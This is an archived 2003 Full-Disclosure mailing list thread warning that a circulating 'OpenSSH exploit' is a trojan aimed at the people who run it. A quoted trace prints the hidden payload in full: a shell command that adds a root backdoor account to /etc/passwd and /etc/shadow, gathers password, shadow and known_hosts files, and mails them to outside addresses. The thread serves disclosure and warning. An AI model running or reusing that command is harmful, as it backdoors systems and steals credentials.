[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <00ec01c37e98$9ba3d500$6a19f4dc@vaio>
From: vosipov at tpg.com.au (V.O.)
Subject: Re: new openssh exploit in the wild! * is FAKE AS SH@!*
Another good example of why closed-source exploits and "private" exploits
are bad (although it is an old story already). The rumours of their
existence can make people (or should I say, script kiddies) fall for
something like this one. Btw the most definite opinion on the exploit I have
heard several times is that there exists one for rooting openbsd, but "it is
unstable... we would not show it to anybody because it is so kludgy...etc."
W.
----- Original Message -----
From: "Raymond Dijkxhoorn" <raymond@...location.net>
To: "Vitaly Osipov" <vosipov@....com.au>
Cc: <full-disclosure@...ts.netsys.com>
Sent: Friday, September 19, 2003 7:40 PM
Subject: Re: [Full-Disclosure] Re: new openssh exploit in the wild! * is
FAKE AS SH@!*
> Hi!
>
> > >> > i looked at this piece of exploit... it is binary so i'am not sure
if
> > >> > this is a trojan or a backdoor or a virus. but i can't see anything
> > >> > strange while sniffing the exploit traffic. and i got root on
serveral
> > >> > of my openbsd boxes with that. the bruteforcer seems to be very
good.
>
> > which is obviously not true. Btw as far as I understand, the troyan code
is triggered when
> > the "exploit" is run with the offset specified, and not in a
"bruteforcing" mode.
>
> He most likely means, he rooted some of hhis own boxes where he tired to
> run the 'exploit'.
>
> Nice piece of social engineering.
>
> > >> printf("[*] sending shellcode\n")= 22
> > >> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> > >> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> > >> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> > >> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
> > >> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp
> |
> > >> /usr/sbin/sendmail -f ownage_at_gmx.de
> > >> m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> > >> 0x0804a6b0
>
> Bye,
> Raymond.
>
>
Powered by blists - more mailing lists